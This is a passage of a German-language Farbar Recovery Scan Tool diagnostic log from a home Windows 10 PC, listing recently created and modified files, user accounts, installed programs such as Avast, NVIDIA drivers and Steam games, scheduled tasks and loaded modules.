2016-04-15 21:19 - 2016-04-15 21:19 - 00003200 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1460747945
2016-04-15 21:19 - 2016-04-15 21:19 - 00001228 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-04-15 21:19 - 2016-04-15 21:19 - 00001082 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-04-15 21:19 - 2016-04-15 21:19 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Mozilla
2016-04-15 21:19 - 2016-04-15 21:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-15 21:19 - 2016-04-15 21:18 - 00161760 _____ (AVAST Software) C:\Windows\system32\Drivers\ngvss.sys
2016-04-15 21:18 - 2016-04-18 11:41 - 01708398 _____ C:\Windows\system32\PerfStringBackup.INI
2016-04-15 21:18 - 2016-04-15 21:19 - 00000000 ____D C:\Program Files\AVAST Software
2016-04-15 21:18 - 2016-04-15 21:18 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00465792 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00398152 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-04-15 21:18 - 2016-04-15 21:18 - 00287528 _____ (AVAST Software) C:\Windows\system32\Drivers\aswvmm.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00166432 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00107792 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00052184 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-04-15 21:18 - 2016-04-15 21:18 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-04-15 21:18 - 2016-04-15 21:18 - 00004006 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-04-15 21:18 - 2016-04-15 21:18 - 00001979 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast Free Antivirus.lnk
2016-04-15 21:18 - 2016-04-15 21:18 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\AVAST Software
2016-04-15 21:17 - 2016-04-15 21:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-04-15 21:17 - 2016-04-15 21:21 - 00000000 ____D C:\Users\Marcel\AppData\Local\NVIDIA
2016-04-15 21:17 - 2016-04-15 21:19 - 00000000 ____D C:\ProgramData\AVAST Software
2016-04-15 21:16 - 2016-04-18 11:35 - 00000000 ____D C:\ProgramData\NVIDIA
2016-04-15 21:16 - 2016-04-15 21:25 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-04-15 21:16 - 2016-04-15 21:25 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-04-15 21:16 - 2016-04-15 21:24 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-04-15 21:16 - 2016-03-22 04:37 - 06369728 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-04-15 21:16 - 2016-03-22 04:37 - 02994744 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-04-15 21:16 - 2016-03-22 04:37 - 02561472 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-04-15 21:16 - 2016-03-22 04:37 - 01265720 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-04-15 21:16 - 2016-03-22 04:37 - 00393784 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-04-15 21:16 - 2016-03-22 04:37 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-04-15 21:16 - 2016-03-18 13:44 - 06253721 _____ C:\Windows\system32\nvcoproc.bin
2016-04-15 21:16 - 2015-11-10 03:19 - 00121672 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2016-04-15 21:15 - 2016-04-15 21:15 - 00002357 _____ C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-15 21:15 - 2016-04-15 21:15 - 00000000 ___RD C:\Users\Marcel\OneDrive
2016-04-15 21:13 - 2016-04-17 13:55 - 00000000 ____D C:\Users\Marcel
2016-04-15 21:13 - 2016-04-15 23:03 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Adobe
2016-04-15 21:13 - 2016-04-15 21:59 - 00000000 ____D C:\Users\Marcel\AppData\Local\Packages
2016-04-15 21:13 - 2016-04-15 21:13 - 00000020 ___SH C:\Users\Marcel\ntuser.ini
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Vorlagen
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Startmenü
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Netzwerkumgebung
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Lokale Einstellungen
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Eigene Dateien
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Druckumgebung
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Videos
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Musik
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Documents\Eigene Bilder
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\AppData\Local\Verlauf
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\AppData\Local\Anwendungsdaten
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 _SHDL C:\Users\Marcel\Anwendungsdaten
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\VirtualStore
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\TileDataLayer
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\Publishers
2016-04-15 21:13 - 2016-04-15 21:13 - 00000000 ____D C:\Users\Marcel\AppData\Local\ActiveSync
2016-04-15 21:12 - 2016-04-15 21:12 - 00000000 ____D C:\Windows\CSC
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Public\Documents\Eigene Videos
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Public\Documents\Eigene Musik
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Public\Documents\Eigene Bilder
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Videos
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Musik
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Bilder
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Programme
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-04-15 21:11 - 2016-04-15 21:11 - 00000000 _SHDL C:\Dokumente und Einstellungen
2016-04-15 21:10 - 2016-04-15 21:10 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-18 11:41 - 2016-02-13 18:59 - 00737872 _____ C:\Windows\system32\perfh007.dat
2016-04-18 11:41 - 2016-02-13 18:59 - 00147558 _____ C:\Windows\system32\perfc007.dat
2016-04-18 11:41 - 2015-10-30 09:21 - 00000000 ____D C:\Windows\INF
2016-04-18 11:35 - 2016-02-13 19:26 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-04-18 11:35 - 2015-10-30 08:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-04-17 21:56 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\AppReadiness
2016-04-16 21:48 - 2015-10-30 09:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-16 03:00 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\appcompat
2016-04-15 22:34 - 2016-02-13 19:32 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-15 22:33 - 2016-02-13 19:13 - 00000000 ____D C:\Program Files\Windows Journal
2016-04-15 22:33 - 2016-02-13 10:22 - 00194272 _____ C:\Windows\system32\FNTCACHE.DAT
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 __RSD C:\Windows\Media
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\bcastdvr
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-04-15 22:33 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-04-15 22:33 - 2015-10-30 08:28 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-04-15 22:33 - 2015-10-30 08:28 - 00000000 ____D C:\Windows\system32\Dism
2016-04-15 22:27 - 2015-10-30 09:11 - 00000000 ____D C:\Windows\CbsTemp
2016-04-15 22:09 - 2015-10-30 09:24 - 00028672 _____ C:\Windows\system32\config\BCD-Template
2016-04-15 21:22 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-04-15 21:16 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\Help
2016-04-15 21:13 - 2015-10-30 09:24 - 00000000 ____D C:\Windows\system32\WinBioDatabase
2016-04-15 21:11 - 2015-10-30 09:24 - 00000000 ____D C:\Program Files\Windows NT
2016-04-15 21:10 - 2015-10-30 08:28 - 00000000 ____D C:\Windows\system32\Sysprep
2016-04-06 20:32 - 2015-10-30 09:26 - 00829944 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-10-30 09:26 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-03-29 12:07 - 2015-10-30 10:13 - 00400302 __RSH C:\bootmgr
2016-03-25 03:23 - 2015-11-10 03:15 - 12659136 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-03-24 13:52 - 2015-11-10 03:14 - 01572496 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2016-03-24 13:52 - 2015-11-10 03:14 - 00205456 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
2016-03-22 06:08 - 2015-11-10 03:17 - 20074728 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-03-22 06:08 - 2015-11-10 03:17 - 17328008 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-03-22 06:08 - 2015-11-10 03:13 - 14226672 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-03-22 06:08 - 2015-11-10 03:09 - 03685280 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-03-22 06:08 - 2015-11-10 03:09 - 03263480 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-03-22 06:08 - 2015-11-10 01:12 - 00038050 _____ C:\Windows\system32\nvinfo.pb

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-15 21:10

==================== Ende von FRST.txt ============================
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:17-04-2016 01
durchgeführt von Marcel (2016-04-18 11:46:31)
Gestartet von C:\Users\Marcel\Desktop
Windows 10 Pro Version 1511 (X64) (2016-04-15 19:12:34)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-922123714-3683550124-3627477911-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-922123714-3683550124-3627477911-503 - Limited - Disabled)
Gast (S-1-5-21-922123714-3683550124-3627477911-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-922123714-3683550124-3627477911-1003 - Limited - Enabled)
Marcel (S-1-5-21-922123714-3683550124-3627477911-1001 - Administrator - Enabled) => C:\Users\Marcel

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
ASRock SmartConnect v1.0.7 (HKLM\...\ASRock SmartConnect_is1) (Version: 1.0.7 - ASRock Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.2.2261 - AVAST Software)
CPUID CPU-Z 1.75 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Dota 2 (HKLM\...\Steam App 570) (Version:  - Valve)
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.44 - mIRC Co. Ltd.)
Mozilla Firefox 45.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.2 (x86 de)) (Version: 45.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0 - Mozilla)
Mozilla Thunderbird 45.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 45.0 (x86 de)) (Version: 45.0 - Mozilla)
MPC-HC 1.7.10 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.10 - MPC-HC Team)
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.72 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.2.66 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.2.66 - NVIDIA Corporation)
NVIDIA Grafiktreiber 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.72 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.4.1 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28549 - Razer Inc.)
SafeZone Stable 1.48.2066.98 (x32 Version: 1.48.2066.98 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.2.66 - NVIDIA Corporation) Hidden
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Stardew Valley (HKLM\...\Steam App 413150) (Version:  - ConcernedApe)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Vulkan Run Time Libraries 1.0.5.1 (HKLM\...\VulkanRT1.0.5.1) (Version: 1.0.5.1 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {246BD131-4B0D-46AE-8EF5-6B571D660CB0} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-04-15] (AVAST Software)
Task: {356EC190-E9A4-4629-8D21-4AFE731EA0B6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {79D1DBAA-81CC-4877-9C47-E9A1A24E57B2} - System32\Tasks\SafeZone scheduled Autoupdate 1460747945 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-03-30] (Avast Software)
Task: {87B4F22D-1DA3-40AB-833B-59486D78A842} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-15] (Adobe Systems Incorporated)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2016-04-15 21:16 - 2016-03-22 04:37 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 00369208 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 00289848 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-04-15 21:21 - 2016-04-05 10:03 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 03613240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2015-11-05 01:11 - 2015-11-05 01:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2016-04-15 21:21 - 2016-04-05 10:04 - 02667576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 01990200 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 01842232 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-04-15 21:21 - 2016-04-05 10:04 - 00208952 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-04-15 21:21 - 2016-04-05 10:03 - 00035896 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-04-15 21:21 - 2016-04-05 10:03 - 00921656 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-04-15 22:24 - 2016-03-29 12:20 - 02656952 _____ () C:\Windows\system32\CoreUIComponents.dll
2016-04-15 22:24 - 2016-03-29 12:20 - 02656952 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-02-13 19:02 - 2016-02-13 19:02 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-15 22:24 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-15 22:24 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-15 22:24 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-15 22:24 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-15 22:24 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-15 21:18 - 2016-04-15 21:18 - 00123344 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-04-15 21:18 - 2016-04-15 21:18 - 00135816 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-04-18 11:18 - 2016-04-18 11:18 - 02890240 _____ () C:\Program Files\AVAST Software\Avast\defs\16041800\algo.dll
2016-04-15 21:18 - 2016-04-15 21:18 - 00478144 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-04-15 21:21 - 2016-04-05 10:11 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-04-15 21:18 - 2016-04-15 21:18 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-02-26 10:29 - 2016-02-26 10:29 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

